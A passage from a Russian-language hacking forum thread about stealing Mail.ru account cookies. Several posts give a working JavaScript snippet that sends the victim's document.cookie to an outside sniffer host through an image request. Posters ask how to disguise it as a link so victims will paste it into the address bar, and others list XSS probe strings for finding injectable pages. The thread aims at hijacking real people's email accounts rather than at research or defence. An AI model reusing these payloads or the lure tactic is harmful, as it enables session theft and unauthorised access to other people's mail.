HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Взлом Mail.ru со сниффером
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 25.03.2010, 01:00
terris
Участник форума
Регистрация: 08.03.2010
Сообщений: 150
С нами: 8515766

Репутация: 14
По умолчанию
vik3001,ты видимо не понял меня. если заставить жертву вставить на адресную строку тот
code:

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;')

то придут куки.Но...вот в чем моя проблема не могу создать ссылку в которую можно было бы вставить тот самый
code:

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;')

и еще ведь на mail.ru уже с открыткой в которой код
code:


img = new Image(); img.src = "http://httpz.ru/nxmmbz4cf20.gif?"+document.cookie;

не получается стырить куки!!!
 
Ответить с цитированием

  #12  
Старый 03.04.2010, 01:00
Bond010296
Новичок
Регистрация: 03.11.2009
Сообщений: 0
С нами: 8694874

Репутация: 0
По умолчанию
чтобы стырить надо жертву заставить явакод для адресной строки себе вставить( А это не так просто! Вот еслибы его можно было под ссылку замаскировать то было-бы гуд)
 
Ответить с цитированием

  #13  
Старый 05.04.2010, 01:00
firs94
Участник форума
Регистрация: 01.12.2009
Сообщений: 114
С нами: 8655446

Репутация: 19
По умолчанию
Цитата:

Сообщение от ROCK_sTaR

Пассивка >alert() и пошёл по страницам искать, подставляя это в адресную строку...

всмысле так искать пасивку а вот как узнать что ты её нашеел и где можон искать и как её добавлять после ссылки типа
http://hacker-pro.net/newreply.php?do=newreply&p=105559>alert()
 
Ответить с цитированием

  #14  
Старый 08.04.2010, 01:00
al1916
Познающий
Регистрация: 08.04.2010
Сообщений: 35
С нами: 8471126

Репутация: -1
По умолчанию
пробуйте подставлять в адресную строку вот эти скрипты для проверки уязвимости:
alert()
">alert()
'>">alert(/XSS/)
alert('xss')
alert('A');
">alert(document .cookie)
 
Ответить с цитированием

  #15  
Старый 10.04.2010, 01:00
forumrulez
Новичок
Регистрация: 26.02.2010
Сообщений: 0
С нами: 8528991

Репутация: 0
По умолчанию
Люди пользуйтесь XSS ето лутше всего чем посылать жертве огромный скрипт
 
Ответить с цитированием

  #16  
Старый 10.07.2010, 01:00
Rahim1
Новичок
Регистрация: 08.07.2010
Сообщений: 12
С нами: 8340086

Репутация: 0
По умолчанию
XSS как ее найти. Я новичек еще. И alert() давно уже неработает
 
Ответить с цитированием

  #17  
Старый 10.07.2010, 01:00
artmaer
Новичок
Регистрация: 23.10.2009
Сообщений: 24
С нами: 8711606

Репутация: -5
По умолчанию
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...